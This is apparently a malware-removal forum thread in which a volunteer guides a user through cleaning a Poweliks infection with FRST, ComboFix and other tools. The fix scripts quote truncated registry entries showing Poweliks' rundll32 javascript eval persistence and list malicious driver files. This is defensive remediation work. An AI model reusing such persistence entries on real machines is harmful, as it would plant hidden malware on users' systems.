Hello everyone, so today I was browsing the internet when I noticed that the sites were loading really slow. Opening folders and files saved on my computer also was taking forever. Avast kept telling me that it blocked a malicious website from internet explorer even though it wasn’t open. So I checked Task Manager to see if it was still running. When Task Manager loaded, there were like 10 COM Surrogates that were taking up all the resources. Every time I tried to end them, they just popped back. Now my comp and internet are very slow and I’ve gotten a few blue screens of death. MBAM didn’t find anything malicious, I just updated it also. I don’t know what to do. Any help would be greatly appreciated. I’ve attached the MBAM, FRST and Addition logs. I’ve been trying to get the aswmbr log but everytime I run it, it freezes or my computer has a BSOD. Ill work on getting it.
Thanks again in advance.
Hi
https://sites.google.com/site/cannedfixes/farbar-recovery-scan-tool/FRST.gif
Fix with Farbar Recovery Scan Tool
https://sites.google.com/site/cannedfixes/home/hosted-images-formatting/icon_exclaim.gif
[b] This fix was created for this user for use on that particular machine.
https://sites.google.com/site/cannedfixes/home/hosted-images-formatting/icon_exclaim.gif
https://sites.google.com/site/cannedfixes/home/hosted-images-formatting/icon_exclaim.gif
Running it on another one may cause damage and render the system unstable.
https://sites.google.com/site/cannedfixes/home/hosted-images-formatting/icon_exclaim.gif
[/b]
Press the
https://sites.google.com/site/cannedfixes/farbar-recovery-scan-tool/WindowsKey.png
- R on your keyboard at the same time. Type Notepad and click OK.
[*]Copy the entire content of the codebox below and paste into the Notepad document:
start
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1130826438-1407137884-1739162223-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs-x32: c:\progra~3\browse~1\261095~1.52\{c16c1~1\browse~1.dll => "c:\progra~3\browse~1\261095~1.52\{c16c1~1\browse~1.dll" File Not Found
CustomCLSID: HKU\S-1-5-21-1130826438-1407137884-1739162223-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp:
end
[*]Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
[*]Right-click on
https://sites.google.com/site/cannedfixes/farbar-recovery-scan-tool/FRST.gif
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
XP users click run after receipt of Windows Security Warning - Open File.
8 users will be prompted about Windows SmartScreen protection - click More information and Run.
[*]Press the Fix button just once and wait.
[*]If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
[*]When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please include it in your reply.
https://sites.google.com/site/cannedfixes/junkware-removal-tool/JRTbythisisu.png
Fix with Junkware Removal Tool
Please download JRT by Thisisu and save the file to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
[*]Right-click on
https://sites.google.com/site/cannedfixes/junkware-removal-tool/JRTbythisisu.png
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
[*]Follow the prompts and let this process run uninterrupted.
[*]This scan can take a while, depending on your System specs.
[*]Upon completion, a log (JRT.txt) will open on your desktop.
Please include the contents of that file in your reply.
Do not forget to re-enable your previously switched off protection software!
Please also manually reboot your machine after this procedure.
https://sites.google.com/site/cannedfixes/adwcleaner/adwcleaner_new.png
Fix with AdwCleaner
Please download AdwCleaner by Xplode and save the file to your desktop.
[*]Right-click on
https://sites.google.com/site/cannedfixes/adwcleaner/adwcleaner_new.png
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
[*]The program will begin to update the database (if internet connection is operational). Please wait a little bit.
[*]Follow the prompts and click Scan.
[*]When finished, please click Clean.
[*]Upon completion, click Report. A log (AdwCleaner[S*].txt) will open.
Please include the contents of that file in your reply.
First, I want to thank you Naathim for taking the time to help me. ;D
I’ve done what you said and I’ve attached the logs. My computer already is doing better. No longer takes 15 minutes to boot up
The COM surrogates also have disappeared. Thanks again.
Hi
My computer already is doing better. No longer takes 15 minutes to boot up :D The COM surrogates also have disappeared. Thanks again
I’m glad to hear that. However, we are not done yet. Please post me a fresh FRST scan results.
https://sites.google.com/site/cannedfixes/farbar-recovery-scan-tool/FRST.gif
Scan with Farbar Recovery Scan Tool
Please re-run Farbar Recovery Scan Tool.
[*]Right-click on
https://sites.google.com/site/cannedfixes/farbar-recovery-scan-tool/FRST.gif
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
XP users click run after receipt of Windows Security Warning - Open File.
8 users will be prompted about Windows SmartScreen protection - click More information and Run.
[*]Make sure that Addition option is checked.
[*]Press Scan button and wait.
[*]The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.
Fresh FRST and Addition logs attached
https://sites.google.com/site/cannedfixes/combofix/51a5bf3d99e8a-ComboFixlogo16.png
Fix with ComboFix
Let’s prepare a Script for ComboFix to mark some things for being deleted.
[*]Press the
https://sites.google.com/site/cannedfixes/farbar-recovery-scan-tool/WindowsKey.png
- R on your keyboard at the same time.
[*]A Run window should appear in the lower left corner. Type in notepad.exe and press Enter.
[*]In the shown window paste in the following script:
Driver::
gaijinls
X6va015
xhunter1
File::
C:\Windows\system32\drivers\gaijinls.sys
C:\Windows\xhunter1.sys
C:\Windows\SysWOW64\Drivers\X6va015
[*]Go to File menu and select Save as.
[*]Make sure that the Save as type option is set to Text files (*.txt) and the place to save will be your desktop.
[*]Name the file CFScript and select Save.
Your CFScript.txt file should appear on your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
[*]Now drag your CFScript file and drop it onto the
https://sites.google.com/site/cannedfixes/combofix/51a5bf3d99e8a-ComboFixlogo16.png
icon:
https://sites.google.com/site/cannedfixes/combofix/CFScript.gif
[*]This will start ComboFix. Let it run uninterrupted!
[*]A reboot may be needed during this run. Allow it.
[*]When finished, it shall produce a log for you at C:\ComboFix.txt and display it.
Please include that log in your next reply.
http://forum.programosy.pl/images/smilies/icon_idea.gif
If you’ll encounter any issues with internet connection after running ComboFix, please visit this link.
http://forum.programosy.pl/images/smilies/icon_idea.gif
If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.
http://forum.programosy.pl/images/smilies/icon_idea.gif
Do not forget to turn on your previously switched-off protection software!
Hey again. Here’s the combofix log. Thankfully there was no issues with the internet afterward.
OK, what issues remain?
https://sites.google.com/site/cannedfixes/activescan/panda-av.jpg
Scan with Panda Cloud Cleaner
This type of scan often produces false positives. In any case do not remove on your own any of its findings! Removal will be made after the careful analysis of the scan results.
Please download Panda Cloud Cleaner and save the file to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
[*]Install the scanner by right-click on
https://sites.google.com/site/cannedfixes/activescan/panda-av.jpg
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator.
[*]It should start itself automaticaly after the installation.
[*]In the main console click Accept and Scan.
[*]This scan won’t take long, about several minutes (depending on your system specs). Let it run uninterrupted.
[*]At the last stage you will see a couple of messages about veryfying & analyzing results. Wait patiently.
[*]Upon completion you will see detections window. Enter one of them and click there View Report at the bottom right side.
[*]A notepad window named PCloudCleaner.log will open. Save it to your desktop.
Please include the contents of that file in your next reply.
Don’t forget to re-enable your switched-off protection software!
After that you may uninstall Panda Cloud Cleaner from your machine, if you wish to.
https://sites.google.com/site/cannedfixes/security-check/51c9d14017fa0-SecurityCheck.PNG
Scan with Security Check
Please download Security Check by Screen317 and save it to your desktop.
[*]Right-click on
https://sites.google.com/site/cannedfixes/security-check/51c9d14017fa0-SecurityCheck.PNG
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start th tool.
[*]Follow onscreen instructions inside the black box. This scan won’t take long.
[*]Soon a notepad document called checkup.txt will open automaticaly.
Please include the content of that document.
I’m not experiencing any issues anymore. My computer and internet are running smoothly. I’ve attached the two logs. Hopefully that virus has disappeared for good
Hi
https://sites.google.com/site/cannedfixes/updating-software/firefox-256.jpg
Updating Mozilla Firefox manually
[*]Please open Firefox.
[*]Click the
https://sites.google.com/site/cannedfixes/updating-software/firefoxmenu.png
icon.
[*]Click Help and select About Firefox.
[]Firefox will search for any updates and start downloading them automatically.
[]When the updates will be ready you will be prompted to restart Firefox. Please do it.
Remember to keep it always updated.
https://sites.google.com/site/cannedfixes/delfix/51a5ce45263de-delfix.png
Clean with DelFix
Please download DelFix by Xplode and save it to your desktop.
[*]Right-click on
https://sites.google.com/site/cannedfixes/delfix/51a5ce45263de-delfix.png
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
[*]Ensure that Remove disinfection tools, Purge system restore and Reset system settings are checked.
[*]Push Run.
[*]When finished, it will display a notepad report.
Include it for my review.
Please also manually reboot your machine after posting your logfile.
Sorry for the wait. FireFox is now up to date. I’ve attached the logfile and will reboot as soon as this gets posted
Subject to no further problems, I think that you are ready to go
Below you will find my thoughts about securing your machine. Go ahead through it, you will benefit from some useful advice about safe computing.
Recommended reading:
http://forum.programosy.pl/images/smilies/icon_exclaim.gif
MUST READ - security tips: Computer Security - a short guide to staying safer online.
http://forum.programosy.pl/images/smilies/icon_exclaim.gif
MUST READ - general maintenance: What to do if your Computer is running slowly?
Recommended additional software:
http://forum.programosy.pl/images/smilies/icon_arrow.gif
TFC - to clean unneeded temporary files.
http://forum.programosy.pl/images/smilies/icon_arrow.gif
Malwarebytes’ Anti-Malware - to scan your system from time to time in search for malware.
http://forum.programosy.pl/images/smilies/icon_arrow.gif
Malwarebytes’ Anti-Exploit - to prevent plenty of mostly exploited vulnerabilities.
http://forum.programosy.pl/images/smilies/icon_arrow.gif
McShield - to prevent infections spread by removable media.
http://forum.programosy.pl/images/smilies/icon_arrow.gif
CryptoPrevent - to secure yourself from very severe CryptoLocker infection.
http://forum.programosy.pl/images/smilies/icon_arrow.gif
Unchecky - to prevent from installing additional foistware, implemented in legitimate installations.
My help is always free, but if you are happy with the help provided and wish to help my fight against malware, please consider making a donation.
All donations are to refund a new HDD to replace the old one, which recently passed away!
https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif
Now if you have any other questions, feel free to ask me. Otherwise simply acknowledge my recommendations and this topic will be closed.
https://sites.google.com/site/cannedfixes/closing/Minion-Bye-smaller.jpg
Stay safe,
Naat
Thank you very much for all your help! I will try to stay safer on the web. Appreciate everything, keep up the awesome work. ;D
You’re welcome